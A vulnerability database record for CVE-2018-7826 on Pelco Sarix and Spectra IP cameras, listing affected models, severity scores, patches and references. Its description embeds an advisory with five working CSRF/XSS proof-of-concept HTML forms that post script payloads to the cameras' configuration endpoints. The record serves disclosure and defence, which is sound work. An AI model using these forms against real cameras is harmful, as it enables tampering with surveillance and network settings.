Details of VAR-201905-1050

ID

VAR-201905-1050

CVE

CVE-2018-7826

TITLE

Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Command injection vulnerability

Trust: 0.8

sources: JVNDB: JVNDB-2018-015519

DESCRIPTION

A Command Injection vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to execute arbitrary commands. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the fact that external input data constructs executable commands, and the network system or product does not properly filter the special elements. An attacker could exploit the vulnerability to execute an illegal command. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter 'enable_leds' locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. Schneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities Vendor: Schneider Electric SE Product web page: https://www.pelco.com Affected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0) Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0) Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722) Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503) Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0) Summary: Pelco offers the broadest selection of IP cameras designed for security surveillance in a wide variety of commercial and industrial settings. From our industry-leading fixed and high-speed IP cameras to panoramic, thermal imaging, explosionproof and more, we offer a camera for any environment, any lighting condition and any application. When nothing but the best will do. SarixaC/ Enhanced Range cameras provide the most robust feature-set for your mission-critical applications. With SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image in difficult lighting conditions such as a combination of bright areas, shaded areas, and intense light. Designed with superior reliability, fault tolerance, and processing speed, these rugged fixed IP cameras ensure you always get the video that you need. Desc: Pelco cameras suffer from multiple dom-based, stored and reflected XSS vulnerabilities when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980) Lighttpd/1.4.28 PHP/5.3.0 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2017-5415 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php 07.04.2017 -- CSRF/XSS on username parameter: ------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/network/dot1x/update" method="POST"> <input type="hidden" name="dot1x" value="on" /> <input type="hidden" name="protocol" value="EAP-TLS" /> <input type="hidden" name="inner_auth" value="CHAP" /> <input type="hidden" name="username" value='"><script>alert(1)</script>' /> <input type="hidden" name="password" value="blah" /> <input type="hidden" name="anonymous_id" value="" /> <input type="hidden" name="ca_certificate" value="test" /> <input type="hidden" name="client_certificate" value="test" /> <input type="hidden" name="private_key" value="test" /> <input type="hidden" name="private_key_password" value="test" /> <input type="submit" value="Submit request" /> </form> </body> </html> CSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter: ------------------------------------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/network/general/update" method="POST"> <input type="hidden" name="hostname" value='"><script>alert(2)</script>' /> <input type="hidden" name="http_port" value='"><script>alert(3)</script>' /> <input type="hidden" name="rtsp_port" value='"><script>alert(4)</script>' /> <input type="hidden" name="dhcp" value="off" /> <input type="hidden" name="ip_address" value='"><script>alert(5)</script>' /> <input type="hidden" name="subnet_mask" value='"><script>alert(6)</script>' /> <input type="hidden" name="gateway" value='"><script>alert(7)</script>' /> <input type="hidden" name="nameservers" value='"><script>alert(8)</script>' /> <input type="submit" value="Submit request" /> </form> </body> </html> CSRF/XSS on version parameter: ------------------------------ <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/network/snmp/update" method="POST"> <input type="hidden" name="version" value='";alert(9)//' /> <input type="hidden" name="v2_community_string" value="public" /> <input type="hidden" name="v2_receiver_address" value="" /> <input type="hidden" name="v2_trap_community_string" value="trapbratce" /> <input type="submit" value="Submit request" /> </form> </body> </html> CSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter: ---------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/system/general/update" method="POST"> <input type="hidden" name="device_name" value='ZSL"><script>alert(10)</script>' /> <input type="hidden" name="enable_leds" value="on" /> <input type="hidden" name="smtp_server" value='"><script>alert(11)</script>' /> <input type="hidden" name="ntp_server_from_dhcp" value="false" /> <input type="hidden" name="ntp_server" value="';alert(12)//'" /> <input type="hidden" name="region" value="Macedonia';alert(13)//" /> <input type="hidden" name="zone" value="Kumanovo';alert(14)//" /> <input type="hidden" name="enable_time_overlay" value="on" /> <input type="hidden" name="enable_name_overlay" value="off" /> <input type="hidden" name="position" value="topright" /> <input type="hidden" name="date_format" value="0" /> <input type="submit" value="Submit request" /> </form> </body> </html> XSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter: -------------------------------------------------------------------------------- <html> <body> <script>history.pushState('', '', '/')</script> <form action="http://192.168.1.1/setup/events/handlers/update" method="POST"> <input type="hidden" name="id" value="" /> <input type="hidden" name="relay_sentinel" value="relay_sentinel" /> <input type="hidden" name="name" value='"><script>alert(15)</script>' /> <input type="hidden" name="type" value="Ftp" /> <input type="hidden" name="email_to" value="" /> <input type="hidden" name="email_from" value="" /> <input type="hidden" name="email_subject" value="" /> <input type="hidden" name="email_message" value="" /> <input type="hidden" name="dest_name" value="IMG%m%d%Y%H%M%S.jpg" /> <input type="hidden" name="limit_size" value="" /> <input type="hidden" name="limit_size_scale" value="K" /> <input type="hidden" name="ftp_server" value='"><script>alert(16)</script>' /> <input type="hidden" name="ftp_username" value='"><script>alert(17)</script>' /> <input type="hidden" name="ftp_password" value='"><script>alert(18)</script>' /> <input type="hidden" name="ftp_base_path" value='"><script>alert(19)</script>' /> <input type="hidden" name="ftp_dest_name" value="IMG%m%d%Y%H%M%S.jpg" /> <input type="hidden" name="relay_bankName" value="GPIO" /> <input type="hidden" name="relay_index" value="0" /> <input type="hidden" name="relay_on_time" value="0.1" /> <input type="hidden" name="relay_off_time" value="0.1" /> <input type="hidden" name="relay_pulse_count" value="" /> <input type="hidden" name="filter_start0" value="" /> <input type="hidden" name="filter_stop0" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html>

Trust: 2.97

sources: NVD: CVE-2018-7826 // JVNDB: JVNDB-2018-015519 // CNVD: CNVD-2017-23302 // CNVD: CNVD-2019-16259 // ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5415 // PACKETSTORM: 143313

IOT TAXONOMY

category:	['ICS', 'Network device']	sub_category:	-	Trust: 0.6
category:	['Network device']	sub_category:	-	Trust: 0.6
category:	['camera device']	sub_category:	camera	Trust: 0.1

sources: OTHER: None // CNVD: CNVD-2017-23302 // CNVD: CNVD-2019-16259

AFFECTED PRODUCTS

vendor:	schneider electric	model:	imes19-1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ixe11	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	d6220l	scope:	gte	version:	2.11	Trust: 1.0
vendor:	schneider electric	model:	ime3122-b1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1ep	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1vp	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ixes1	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1vi	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1es	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ixe21	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1ei	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1es	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1ep	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1vi	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1es	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1vs	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-b1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1ei	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1vi	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-b1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1vs	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1ep	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1ep	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-b1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1vs	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1vp	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1vi	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1vp	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	d6220	scope:	gte	version:	2.11	Trust: 1.0
vendor:	schneider electric	model:	ime3122-b1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	d6230	scope:	gte	version:	2.11	Trust: 1.0
vendor:	schneider electric	model:	ime119-1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1ep	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	d6230l	scope:	gte	version:	2.11	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1ei	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1vp	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1ei	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1es	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1es	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	imes19-1vs	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime119-1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1s	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1vs	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1vi	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ixe31	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime219-1vp	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-1ei	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime3122-1i	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	ime319-b1p	scope:	lt	version:	2.2.3.0	Trust: 1.0
vendor:	schneider electric	model:	d6220	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	d6220l	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	d6230	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	d6230l	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	ime119-1i	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	ime119-1p	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	ime119-1s	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	imes19-1i	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	imes19-1p	scope:	-	version:	-	Trust: 0.8
vendor:	schneider electric	model:	imes19-1s	scope:	-	version:	-	Trust: 0.8
vendor:	pelco	model:	sarix/spectra cameras	scope:	-	version:	-	Trust: 0.6
vendor:	schneider	model:	electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0	scope:	eq	version:	-	Trust: 0.6
vendor:	schneider	model:	electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503	scope:	eq	version:	-	Trust: 0.6
vendor:	schneider	model:	electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722	scope:	eq	version:	-	Trust: 0.6
vendor:	schneider	model:	electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0	scope:	eq	version:	-	Trust: 0.6
vendor:	schneider	model:	electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0	scope:	eq	version:	-	Trust: 0.6
vendor:	schneider	model:	electric 1st gen pelco sarix enhanced camera	scope:	-	version:	-	Trust: 0.6
vendor:	schneider electric se	model:	pelco sarix/spectra cameras root remote code execution	scope:	eq	version:	sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras root remote code execution	scope:	eq	version:	sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras root remote code execution	scope:	eq	version:	sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras root remote code execution	scope:	eq	version:	sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras root remote code execution	scope:	eq	version:	spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras multiple xss vulnerabilities	scope:	eq	version:	sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras multiple xss vulnerabilities	scope:	eq	version:	sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras multiple xss vulnerabilities	scope:	eq	version:	sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras multiple xss vulnerabilities	scope:	eq	version:	sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)	Trust: 0.1
vendor:	schneider electric se	model:	pelco sarix/spectra cameras multiple xss vulnerabilities	scope:	eq	version:	spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)	Trust: 0.1

sources: ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5415 // CNVD: CNVD-2017-23302 // CNVD: CNVD-2019-16259 // JVNDB: JVNDB-2018-015519 // NVD: CVE-2018-7826

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2018-7826
value:	HIGH
Trust: 1.0
NVD:	CVE-2018-7826
value:	HIGH
Trust: 0.8
CNVD:	CNVD-2017-23302
value:	MEDIUM
Trust: 0.6
CNVD:	CNVD-2019-16259
value:	HIGH
Trust: 0.6
CNNVD:	CNNVD-201905-909
value:	HIGH
Trust: 0.6
ZSL:	ZSL-2017-5417
value:	(4/5)
Trust: 0.1
ZSL:	ZSL-2017-5415
value:	(3/5)
Trust: 0.1

nvd@nist.gov:	CVE-2018-7826
severity:	MEDIUM
baseScore:	6.5
vectorString:	AV:N/AC:L/AU:S/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	SINGLE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	8.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
CNVD:	CNVD-2017-23302
severity:	MEDIUM
baseScore:	4.3
vectorString:	AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector:	NETWORK
accessComplexity:	MEDIUM
authentication:	NONE
confidentialityImpact:	NONE
integrityImpact:	PARTIAL
availabilityImpact:	NONE
exploitabilityScore:	8.6
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
CNVD:	CNVD-2019-16259
severity:	HIGH
baseScore:	7.5
vectorString:	AV:N/AC:L/AU:N/C:P/I:P/A:P
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	PARTIAL
availabilityImpact:	PARTIAL
exploitabilityScore:	10.0
impactScore:	6.4
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6

nvd@nist.gov:	CVE-2018-7826
baseSeverity:	HIGH
baseScore:	8.8
vectorString:	CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	LOW
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	HIGH
availabilityImpact:	HIGH
exploitabilityScore:	2.8
impactScore:	5.9
version:	3.0
Trust: 1.8

sources: ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5415 // CNVD: CNVD-2017-23302 // CNVD: CNVD-2019-16259 // JVNDB: JVNDB-2018-015519 // CNNVD: CNNVD-201905-909 // NVD: CVE-2018-7826

PROBLEMTYPE DATA

problemtype:

CWE-77

Trust: 1.8

sources: JVNDB: JVNDB-2018-015519 // NVD: CVE-2018-7826

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201905-909

TYPE

command injection

Trust: 0.6

sources: CNNVD: CNNVD-201905-909

CONFIGURATIONS

sources: JVNDB: JVNDB-2018-015519

EXPLOIT AVAILABILITY

sources: ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5415

PATCH

title:	SEVD-2019-045-03	url:	https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/	Trust: 0.8
title:	Patch for SchneiderElectric1stGenPelcoSarixEnhancedCamera Command Injection Vulnerability (CNVD-2019-16259)	url:	https://www.cnvd.org.cn/patchInfo/show/162757	Trust: 0.6
title:	Schneider Electric 1st Gen Pelco Sarix Enhanced Camera Fixes for command injection vulnerabilities	url:	http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=92887	Trust: 0.6

sources: CNVD: CNVD-2019-16259 // JVNDB: JVNDB-2018-015519 // CNNVD: CNNVD-201905-909

EXTERNAL IDS

db:	NVD	id:	CVE-2018-7826	Trust: 3.1
db:	SCHNEIDER	id:	SEVD-2019-045-03	Trust: 2.4
db:	JVNDB	id:	JVNDB-2018-015519	Trust: 0.8
db:	EXPLOIT-DB	id:	42307	Trust: 0.7
db:	EXPLOITDB	id:	42307	Trust: 0.6
db:	CNVD	id:	CNVD-2017-23302	Trust: 0.6
db:	CNVD	id:	CNVD-2019-16259	Trust: 0.6
db:	CNNVD	id:	CNNVD-201905-909	Trust: 0.6
db:	PACKETSTORM	id:	143313	Trust: 0.2
db:	ZSL	id:	ZSL-2017-5415	Trust: 0.2
db:	PACKETSTORM	id:	143315	Trust: 0.1
db:	NVD	id:	CVE-2018-7829	Trust: 0.1
db:	CXSECURITY	id:	WLB-2017070080	Trust: 0.1
db:	EXPLOIT-DB	id:	42309	Trust: 0.1
db:	ZSL	id:	ZSL-2017-5417	Trust: 0.1
db:	NVD	id:	CVE-2018-7827	Trust: 0.1
db:	CXSECURITY	id:	WLB-2017070075	Trust: 0.1
db:	OTHER	id:	NONE	Trust: 0.1

sources: ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5415 // OTHER: None // CNVD: CNVD-2017-23302 // CNVD: CNVD-2019-16259 // JVNDB: JVNDB-2018-015519 // PACKETSTORM: 143313 // CNNVD: CNNVD-201905-909 // NVD: CVE-2018-7826

REFERENCES

url:	https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/	Trust: 2.4
url:	https://nvd.nist.gov/vuln/detail/cve-2018-7826	Trust: 1.4
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7826	Trust: 0.8
url:	https://www.exploit-db.com/exploits/42307/	Trust: 0.7
url:	https://www.exploit-db.com/exploits/42309/	Trust: 0.1
url:	https://cxsecurity.com/issue/wlb-2017070080	Trust: 0.1
url:	https://packetstormsecurity.com/files/143315	Trust: 0.1
url:	https://exchange.xforce.ibmcloud.com/vulnerabilities/129667	Trust: 0.1
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829	Trust: 0.1
url:	https://cxsecurity.com/issue/wlb-2017070075	Trust: 0.1
url:	https://packetstormsecurity.com/files/143313	Trust: 0.1
url:	https://exchange.xforce.ibmcloud.com/vulnerabilities/129665	Trust: 0.1
url:	https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827	Trust: 0.1
url:	https://ieeexplore.ieee.org/abstract/document/10769424	Trust: 0.1
url:	http://192.168.1.1/setup/network/dot1x/update"	Trust: 0.1
url:	http://192.168.1.1/setup/system/general/update"	Trust: 0.1
url:	http://192.168.1.1/setup/events/handlers/update"	Trust: 0.1
url:	http://192.168.1.1/setup/network/general/update"	Trust: 0.1
url:	http://192.168.1.1/setup/network/snmp/update"	Trust: 0.1
url:	https://www.pelco.com	Trust: 0.1
url:	http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php	Trust: 0.1

CREDITS

Vulnerability discovered by Gjoko Krstic

Trust: 0.2

sources: ZSL: ZSL-2017-5417 // ZSL: ZSL-2017-5415

SOURCES

db:	ZSL	id:	ZSL-2017-5417
db:	ZSL	id:	ZSL-2017-5415
db:	OTHER	id:	-
db:	CNVD	id:	CNVD-2017-23302
db:	CNVD	id:	CNVD-2019-16259
db:	JVNDB	id:	JVNDB-2018-015519
db:	PACKETSTORM	id:	143313
db:	CNNVD	id:	CNNVD-201905-909
db:	NVD	id:	CVE-2018-7826

LAST UPDATE DATE

2025-01-30T22:06:48.734000+00:00

SOURCES UPDATE DATE

db:	ZSL	id:	ZSL-2017-5417	date:	2019-02-23T00:00:00
db:	ZSL	id:	ZSL-2017-5415	date:	2019-02-23T00:00:00
db:	CNVD	id:	CNVD-2017-23302	date:	2017-08-28T00:00:00
db:	CNVD	id:	CNVD-2019-16259	date:	2019-06-02T00:00:00
db:	JVNDB	id:	JVNDB-2018-015519	date:	2019-06-11T00:00:00
db:	CNNVD	id:	CNNVD-201905-909	date:	2019-05-29T00:00:00
db:	NVD	id:	CVE-2018-7826	date:	2024-11-21T04:12:48.163

SOURCES RELEASE DATE

db:	ZSL	id:	ZSL-2017-5417	date:	2017-07-10T00:00:00
db:	ZSL	id:	ZSL-2017-5415	date:	2017-07-10T00:00:00
db:	CNVD	id:	CNVD-2017-23302	date:	2017-08-28T00:00:00
db:	CNVD	id:	CNVD-2019-16259	date:	2019-06-02T00:00:00
db:	JVNDB	id:	JVNDB-2018-015519	date:	2019-06-11T00:00:00
db:	PACKETSTORM	id:	143313	date:	2017-07-11T04:32:15
db:	CNNVD	id:	CNNVD-201905-909	date:	2019-05-22T00:00:00
db:	NVD	id:	CVE-2018-7826	date:	2019-05-22T20:29:01.230